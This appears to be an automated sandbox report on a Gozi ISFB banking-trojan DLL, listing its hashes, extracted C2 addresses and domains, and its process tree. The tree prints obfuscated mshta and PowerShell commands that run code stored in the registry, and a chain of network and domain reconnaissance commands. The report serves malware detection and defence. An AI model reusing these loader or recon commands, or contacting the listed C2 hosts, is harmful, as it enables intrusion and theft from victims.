Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-08-2022 09:30

General

  • Target

    62ea3f935563b.dll

  • Size

    300KB

  • MD5

    614e312af0e5de7c6b9819e3a1c766d4

  • SHA1

    01e384618d8eadb244184e66e6450752ea0ceade

  • SHA256

    982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203

  • SHA512

    362b32fbc61baf1c757f72d61e582e2741553eda4de022311757a0732a23edabafbcd6affdab97c49d5e1378587b16f1d6730fd9446c801d791056896414d302

Malware Config

Extracted

Family

gozi_ifsb

Botnet

3000

C2

config.edge.skype.com

37.120.206.71

37.120.206.84

193.106.191.163

Attributes
  • base_path

    /drew/

  • build

    250240

  • exe_type

    loader

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi_ifsb

Botnet

3000

C2

37.120.206.91

37.120.206.95

havefuntxmm.at

5.42.199.57

xerkdeoleone.at

Attributes
  • base_path

    /images/

  • build

    250240

  • exe_type

    worker

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Discovers systems in the same network 1 TTPs 3 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3444
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Modifies registry class
    PID:5096
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:4408
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:3788
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2648
        • C:\Windows\system32\regsvr32.exe
          regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:428
          • C:\Windows\SysWOW64\regsvr32.exe
            /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4556
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ytyk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ytyk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\8A2718CF-61F1-4CDB-3B5E-25409F722974\\\ManagerMemory'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2216
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name idjndxe -value gp; new-alias -name bifqcj -value iex; bifqcj ([System.Text.Encoding]::ASCII.GetString((idjndxe "HKCU:Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974").ProcessOptions))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4384
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l3z4y1p4\l3z4y1p4.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4108
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F03.tmp" "c:\Users\Admin\AppData\Local\Temp\l3z4y1p4\CSCD5E2C973230047EB9396AC76FA5C35C8.TMP"
                5⤵
                  PID:3796
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gonep1pl\gonep1pl.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3116
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F80.tmp" "c:\Users\Admin\AppData\Local\Temp\gonep1pl\CSCD127D4C758CE4227BCC828CF19FCFE9.TMP"
                  5⤵
                    PID:3580
            • C:\Windows\system32\cmd.exe
              cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\C850.bin1"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4292
              • C:\Windows\system32\more.com
                more
                3⤵
                  PID:852
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic computersystem get domain
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5064
              • C:\Windows\syswow64\cmd.exe
                "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
                2⤵
                  PID:5000
                • C:\Windows\system32\cmd.exe
                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                  2⤵
                    PID:1984
                  • C:\Windows\system32\cmd.exe
                    cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:5060
                  • C:\Windows\system32\cmd.exe
                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                    2⤵
                      PID:656
                    • C:\Windows\system32\cmd.exe
                      cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:612
                      • C:\Windows\system32\net.exe
                        net view
                        3⤵
                        • Discovers systems in the same network
                        PID:4836
                    • C:\Windows\system32\cmd.exe
                      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                      2⤵
                        PID:2040
                      • C:\Windows\system32\cmd.exe
                        cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:616
                        • C:\Windows\system32\nslookup.exe
                          nslookup 127.0.0.1
                          3⤵
                            PID:4508
                        • C:\Windows\system32\cmd.exe
                          cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                          2⤵
                            PID:4624
                          • C:\Windows\system32\cmd.exe
                            cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                            2⤵
                              PID:2616
                              • C:\Windows\system32\tasklist.exe
                                tasklist.exe /SVC
                                3⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4444
                            • C:\Windows\system32\cmd.exe
                              cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                              2⤵
                                PID:4208
                              • C:\Windows\system32\cmd.exe
                                cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                                2⤵
                                  PID:4732
                                  • C:\Windows\system32\driverquery.exe
                                    driverquery.exe
                                    3⤵
                                      PID:4616
                                  • C:\Windows\system32\cmd.exe
                                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                                    2⤵
                                      PID:1768
                                    • C:\Windows\system32\cmd.exe
                                      cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                                      2⤵
                                        PID:3476
                                        • C:\Windows\system32\reg.exe
                                          reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
                                          3⤵
                                            PID:4604
                                        • C:\Windows\system32\cmd.exe
                                          cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                                          2⤵
                                            PID:596
                                          • C:\Windows\system32\cmd.exe
                                            cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                                            2⤵
                                              PID:1976
                                              • C:\Windows\system32\net.exe
                                                net config workstation
                                                3⤵
                                                  PID:3012
                                                  • C:\Windows\system32\net1.exe
                                                    C:\Windows\system32\net1 config workstation
                                                    4⤵
                                                      PID:2696
                                                • C:\Windows\system32\cmd.exe
                                                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                                                  2⤵
                                                    PID:4904
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                                                    2⤵
                                                      PID:428
                                                      • C:\Windows\system32\nltest.exe
                                                        nltest /domain_trusts
                                                        3⤵
                                                          PID:332
                                                      • C:\Windows\system32\cmd.exe
                                                        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                                                        2⤵
                                                          PID:2036
                                                        • C:\Windows\system32\cmd.exe
                                                          cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                                                          2⤵
                                                            PID:2456
                                                            • C:\Windows\system32\nltest.exe
                                                              nltest /domain_trusts /all_trusts
                                                              3⤵
                                                                PID:2032
                                                            • C:\Windows\system32\cmd.exe
                                                              cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                                                              2⤵
                                                                PID:1360
                                                              • C:\Windows\system32\cmd.exe
                                                                cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                                                                2⤵
                                                                  PID:1936
                                                                  • C:\Windows\system32\net.exe
                                                                    net view /all /domain
                                                                    3⤵
                                                                    • Discovers systems in the same network
                                                                    PID:4216
                                                                • C:\Windows\system32\cmd.exe
                                                                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                                                                  2⤵
                                                                    PID:4156
                                                                  • C:\Windows\system32\cmd.exe
                                                                    cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                                                                    2⤵
                                                                      PID:1528
                                                                      • C:\Windows\system32\net.exe
                                                                        net view /all
                                                                        3⤵
                                                                        • Discovers systems in the same network
                                                                        PID:3248
                                                                    • C:\Windows\system32\cmd.exe
                                                                      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                                                                      2⤵
                                                                        PID:2308
                                                                      • C:\Windows\system32\cmd.exe
                                                                        cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\C850.bin1 > C:\Users\Admin\AppData\Local\Temp\C850.bin & del C:\Users\Admin\AppData\Local\Temp\C850.bin1"
                                                                        2⤵
                                                                          PID:3640
                                                                      • C:\Windows\system32\systeminfo.exe
                                                                        systeminfo.exe
                                                                        1⤵
                                                                        • Gathers system information
                                                                        PID:384

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v6

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        cd59f10228885715c333d108db13007f

                                                                        SHA1

                                                                        431666dc5693935be2cf9b18fa689568f34e20b8

                                                                        SHA256

                                                                        8b5374afbd47876195196d8df87f2ddafce360434215042b3de53fba9599901a

                                                                        SHA512

                                                                        02cba01ce794c077e25dd59bb0335150b3550ac733d7542e831ab8b0ae3e209e6f1f1d04b429af2fb60daf2490e089b8f6abfd5de8027ad2f139c047cb62cb43

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        44B

                                                                        MD5

                                                                        f7aea2435aa888b709ca20f816c33bfd

                                                                        SHA1

                                                                        38717c9a73b5f8bd399839cbe0aa57518427e758

                                                                        SHA256

                                                                        f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5

                                                                        SHA512

                                                                        1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        b4d5b46f6cbb26eae4510ffefbd50180

                                                                        SHA1

                                                                        5b2bace7028f97c76cc98177ee27dd1d3a7d947a

                                                                        SHA256

                                                                        03c078be2f8e50148af07cd81ffdaeabbe6421c8448487144f05ed159633194b

                                                                        SHA512

                                                                        60d92dfd725e186ba12f5752cab6a6aae10f2bcc30a4ae7ee73137ae71a0310fb2e9d51ed35e1cc38392ec26f22d33da8378162af1607c3f79bc499513432333

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        b4d5b46f6cbb26eae4510ffefbd50180

                                                                        SHA1

                                                                        5b2bace7028f97c76cc98177ee27dd1d3a7d947a

                                                                        SHA256

                                                                        03c078be2f8e50148af07cd81ffdaeabbe6421c8448487144f05ed159633194b

                                                                        SHA512

                                                                        60d92dfd725e186ba12f5752cab6a6aae10f2bcc30a4ae7ee73137ae71a0310fb2e9d51ed35e1cc38392ec26f22d33da8378162af1607c3f79bc499513432333

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        11304e810189d866fb1d067b4226f720

                                                                        SHA1

                                                                        37f1c3a86c37957bd6f1ee4355a7228969de8954

                                                                        SHA256

                                                                        051f33538ab034544e8c652ca3967a3590e6749c1119e092b8378e3562dd152f

                                                                        SHA512

                                                                        4be53d94bc47367bfda906bae5ae024f07ddbbec6c7668c9aab13d9c149b94fd887f751d23e6d592f67dea48a4a817c5ab53e2f2b857f9af8c29e31f8e2d5e10

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        6555e00a5bd734ac4985eae8005caa4a

                                                                        SHA1

                                                                        8db986ba58e89bbef081e8c62cfcbb698faefbab

                                                                        SHA256

                                                                        14601575b135a2a88a3052d986b9e10bac67bec1d9a0cc34a2a721bf6ac81a2e

                                                                        SHA512

                                                                        fdb104e96b1c20b2984710cc3d823eb47ad2d1bb747d92d43001f0acbed053b4b8de030f697293643b147820e3f5973f7e39ecf4455dd5b3684dbe7767fbfdbb

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        6555e00a5bd734ac4985eae8005caa4a

                                                                        SHA1

                                                                        8db986ba58e89bbef081e8c62cfcbb698faefbab

                                                                        SHA256

                                                                        14601575b135a2a88a3052d986b9e10bac67bec1d9a0cc34a2a721bf6ac81a2e

                                                                        SHA512

                                                                        fdb104e96b1c20b2984710cc3d823eb47ad2d1bb747d92d43001f0acbed053b4b8de030f697293643b147820e3f5973f7e39ecf4455dd5b3684dbe7767fbfdbb

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        9KB

                                                                        MD5

                                                                        85ece63f96c67c19c30d853daa1f2f80

                                                                        SHA1

                                                                        6dabfd5ea6ae3a2248d837afde06566e7f21d8c7

                                                                        SHA256

                                                                        69b1314c678146fd450e7d176d7c6a6b899cc22b586fb47e9c82f2fa342760f5

                                                                        SHA512

                                                                        bbbe91e7de73c40b22c9560fea39fdb97bbd97c910cb43034d1e6204f7b90462872c95416df92fe80e67a8b8307a5b6057d9184be6d6bab2a904225c4034d5d2

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        9KB

                                                                        MD5

                                                                        85ece63f96c67c19c30d853daa1f2f80

                                                                        SHA1

                                                                        6dabfd5ea6ae3a2248d837afde06566e7f21d8c7

                                                                        SHA256

                                                                        69b1314c678146fd450e7d176d7c6a6b899cc22b586fb47e9c82f2fa342760f5

                                                                        SHA512

                                                                        bbbe91e7de73c40b22c9560fea39fdb97bbd97c910cb43034d1e6204f7b90462872c95416df92fe80e67a8b8307a5b6057d9184be6d6bab2a904225c4034d5d2

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        35KB

                                                                        MD5

                                                                        064e1c6d618d51982a3fc49034449279

                                                                        SHA1

                                                                        02b24698dd2deda95e2b4a6a89dcd4aba575cba6

                                                                        SHA256

                                                                        3342616c61590237764c5eb15305ff061ff5214d0d0f1a6629ac8c555344983e

                                                                        SHA512

                                                                        74cd677be6c6a2f0d5c9b58b5f0f185c1f3bfafc12565a9953f525f5c60dbab6db4fb8054620c3c879ac5cf415f35603be14e20b7f11dc0dac22672a32dedabf

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        35KB

                                                                        MD5

                                                                        064e1c6d618d51982a3fc49034449279

                                                                        SHA1

                                                                        02b24698dd2deda95e2b4a6a89dcd4aba575cba6

                                                                        SHA256

                                                                        3342616c61590237764c5eb15305ff061ff5214d0d0f1a6629ac8c555344983e

                                                                        SHA512

                                                                        74cd677be6c6a2f0d5c9b58b5f0f185c1f3bfafc12565a9953f525f5c60dbab6db4fb8054620c3c879ac5cf415f35603be14e20b7f11dc0dac22672a32dedabf

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        64KB

                                                                        MD5

                                                                        62e78c50aac8d85dc5921a8fa49476e5

                                                                        SHA1

                                                                        11ffee8c79e8ea84c5ef347451115379a1b5cf25

                                                                        SHA256

                                                                        a9dc4122649f89630c6383ce1602691faee10e9a5835d3e36709b7c4cbb802f5

                                                                        SHA512

                                                                        3748f7781dc4d4bd24a69cd532226d0c621fe7e95c2eba8efaf57042017fddfbe45bd9c8aee17c42e8a13575aa30b1b791c733ce25a468d814cf4693865f1f3a

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        64KB

                                                                        MD5

                                                                        62e78c50aac8d85dc5921a8fa49476e5

                                                                        SHA1

                                                                        11ffee8c79e8ea84c5ef347451115379a1b5cf25

                                                                        SHA256

                                                                        a9dc4122649f89630c6383ce1602691faee10e9a5835d3e36709b7c4cbb802f5

                                                                        SHA512

                                                                        3748f7781dc4d4bd24a69cd532226d0c621fe7e95c2eba8efaf57042017fddfbe45bd9c8aee17c42e8a13575aa30b1b791c733ce25a468d814cf4693865f1f3a

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        1e1ee75c750bc92d38124ac10b634351

                                                                        SHA1

                                                                        49c0d724825a589a830b3e24e7b6e63197dbc267

                                                                        SHA256

                                                                        01399d883cf2af6374962b1c900d17c84dadb3c2fbb26218224208d69951cf97

                                                                        SHA512

                                                                        256e5ee76b4464bd0dcd9bfbcc85dd5b05572da458abe15a3446a119b06c4f694cdbf29e7b0bdf592f01c4e81ced5e67e8a78cba820336b3291c3d37b28b851f

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        1e1ee75c750bc92d38124ac10b634351

                                                                        SHA1

                                                                        49c0d724825a589a830b3e24e7b6e63197dbc267

                                                                        SHA256

                                                                        01399d883cf2af6374962b1c900d17c84dadb3c2fbb26218224208d69951cf97

                                                                        SHA512

                                                                        256e5ee76b4464bd0dcd9bfbcc85dd5b05572da458abe15a3446a119b06c4f694cdbf29e7b0bdf592f01c4e81ced5e67e8a78cba820336b3291c3d37b28b851f

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        a02aaa0b88c1c0e78d57de5c5030a0f5

                                                                        SHA1

                                                                        f705b3e4411ce3fd568df68ec50444b124dded80

                                                                        SHA256

                                                                        80829bd83b8024dbb40c5ae27926ad7e77dcb3c1ed1cda8b2bc2822daa6f3780

                                                                        SHA512

                                                                        3be19135519a0bfb22c87cb890b9e82403746da773be6aac55d3e15bfcfbc3f5e9959ddbef408e88cb146f9b1844a0bf7f614c3563cc01dc9908e00f13513c8a

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        4dfe7605d104363749b031810b0ed58a

                                                                        SHA1

                                                                        879ade695f3cee771e5ec57c648946b5064a86a8

                                                                        SHA256

                                                                        7b5d9bfeda2472edc4aba4a1ee23857a62b12cd50bac1ebf0a6b69b167056bfa

                                                                        SHA512

                                                                        b14ebad24201fe546cf1703ce65bce0d206c74d9cbf2e9b8637b84a8b1c58ea2070328f8d1dd96fc19820a738bcb519d11cd83dcc4429363e6913942f1db8982

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        ae8cd7c77619badaa90ce1fc70c97a82

                                                                        SHA1

                                                                        5d1de7e2a02422a967a87183e18ad21a47877d36

                                                                        SHA256

                                                                        126e9149cb9692c0116044bc8efba7db39f455b181e03809ba708b92e31040be

                                                                        SHA512

                                                                        3d603aa42838de2bc90b9f77510615a5c31e4f0965efb198b792a131f12fc05fba109442802e3b448c48ef39fd5278fe99906a4993ebc8fd98f5bb43357ff554

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        cd59f10228885715c333d108db13007f

                                                                        SHA1

                                                                        431666dc5693935be2cf9b18fa689568f34e20b8

                                                                        SHA256

                                                                        8b5374afbd47876195196d8df87f2ddafce360434215042b3de53fba9599901a

                                                                        SHA512

                                                                        02cba01ce794c077e25dd59bb0335150b3550ac733d7542e831ab8b0ae3e209e6f1f1d04b429af2fb60daf2490e089b8f6abfd5de8027ad2f139c047cb62cb43

                                                                      • C:\Users\Admin\AppData\Local\Temp\RES7F03.tmp

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        dec1e106b9bd42ff76dcca48a4647c7f

                                                                        SHA1

                                                                        700c079453dddae9cb51e6048056e21f3a29f8b7

                                                                        SHA256

                                                                        675f5b7af3c3be845e7b1f5b1fb3f8ba16370e7400e3151c15722e85185e4b06

                                                                        SHA512

                                                                        3293dc2110074e5913d19e7f1737c384eceeb12f46d98f39ce0171dbe97e6777c2aa587a32db7eb87c4ae4df1fe3e789b18b538e9f26ce2d2662520e8e403f70

                                                                      • C:\Users\Admin\AppData\Local\Temp\RES7F80.tmp

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        99f16ff1da7e804feb5e04290e668d40

                                                                        SHA1

                                                                        416ad9642d6bff1e68deb308ad4b912007173636

                                                                        SHA256

                                                                        be6a979c37f0e67a6ca68b41264c5260fa322ff4b64501457f13c221e93d8609

                                                                        SHA512

                                                                        0fe14f6280f4a1bbbf65374e8afcb0670185366cd9ba4d174dee47a4293d9b5d73ef90a42282d61fba1aad99bfadfe7c6493f4042daf3288a22178c856ecd297

                                                                      • C:\Users\Admin\AppData\Local\Temp\gonep1pl\gonep1pl.dll

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        777821e762608d2478554cc466301fd4

                                                                        SHA1

                                                                        4b5a0f3721d809984415ea2690f802582aa00633

                                                                        SHA256

                                                                        0396723ec1105c30f3f49c7a802a39fd9ac6c5c425c9ee5424c093172ebee0af

                                                                        SHA512

                                                                        28166ca3e093a667b55a802fbe0f9f695810aeebf7c33f1938f0827b1c5c39eefb628541bdd1fe3e5ce1c05004dddcdcb06dcc08548cecdde51c548d316d4800

                                                                      • C:\Users\Admin\AppData\Local\Temp\l3z4y1p4\l3z4y1p4.dll

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        b8c0cd5cece832852d7ca26c0f7ddabe

                                                                        SHA1

                                                                        8cf07785708a754cedd67107652c879da7322de0

                                                                        SHA256

                                                                        fda0200dcb3dc7ca5cbe804ef38af5e32a19a992a1574fd36d5b3443b19be0f2

                                                                        SHA512

                                                                        d493faea775f560243423cfaf1c2bd56902276fed3e6a6d4c68ee99f4cc5653a99ffbb8faf48efed729013bd436cdb27aead31ba3a7aaa34ec0bbd8b05310842

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\gonep1pl\CSCD127D4C758CE4227BCC828CF19FCFE9.TMP

                                                                        Filesize

                                                                        652B

                                                                        MD5

                                                                        146183315847259526b776f4e05702d4

                                                                        SHA1

                                                                        9c16126b9c80ce0a775dd0e2b1b6a42c2f817b6d

                                                                        SHA256

                                                                        9176550073b3105d0fbf6cf246ae7b244289943b5230d1315d6daf26d2c955f7

                                                                        SHA512

                                                                        2cc4cdaf3330fb058782c880eec0b8e49712ae3cd5f199a8f892ddde20fc7ec165ba3f9a7c5e83e5ae0aa1cf8edbe0dfab421ada3084c41a5942157f494f04d8

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\gonep1pl\gonep1pl.0.cs

                                                                        Filesize

                                                                        400B

                                                                        MD5

                                                                        aca9704199c51fde14b8bf8165bc2a4c

                                                                        SHA1

                                                                        789b408ccad29240bd093515cbd19a199ad2c1c8

                                                                        SHA256

                                                                        cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27

                                                                        SHA512

                                                                        a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\gonep1pl\gonep1pl.cmdline

                                                                        Filesize

                                                                        369B

                                                                        MD5

                                                                        a12dbc03083c923b91f0ae5e81c0fa65

                                                                        SHA1

                                                                        2e75e9e5e1bfc1a941ba7fed967b1058f5e0f4b1

                                                                        SHA256

                                                                        d2b3d6b1ca5ec7600b844f6108ec1da5367895c8f6bfcc9de580f4a30346b4b9

                                                                        SHA512

                                                                        7a65f3c48de859102d6725b7093ab38bfd2edb9737be999f926e04fd96a90a934fb162290e32b8d7e3ec267f1374e7b2623060637d419b18778f00a637971762

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\l3z4y1p4\CSCD5E2C973230047EB9396AC76FA5C35C8.TMP

                                                                        Filesize

                                                                        652B

                                                                        MD5

                                                                        4e155fb1f268acea23442266fa8c4cf3

                                                                        SHA1

                                                                        cb4dc2af42c4266dbbf55b5dc1135b51e3586d28

                                                                        SHA256

                                                                        e5b9cd9a3318ad01f7c89ffe770a17c1ebd206dff950943fa7b463ee76e166f9

                                                                        SHA512

                                                                        ae27fdfbdf04fb2de3f473a078e3154caf8f2d0f277f0ef9e149f6b8e517e27d5e9cb83dc8f726261ff91acd2657300e3f1c099e49fb173c56fdbdb0dae8f999

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\l3z4y1p4\l3z4y1p4.0.cs

                                                                        Filesize

                                                                        410B

                                                                        MD5

                                                                        9a10482acb9e6952b96f4efc24d9d783

                                                                        SHA1

                                                                        5cfc9bf668351df25fcda98c3c2d0bb056c026c3

                                                                        SHA256

                                                                        a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377

                                                                        SHA512

                                                                        e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\l3z4y1p4\l3z4y1p4.cmdline

                                                                        Filesize

                                                                        369B

                                                                        MD5

                                                                        857aefc206e63debbae5504d0f213632

                                                                        SHA1

                                                                        fc39ba707407a0cf88f36039cf3d00e758c335d7

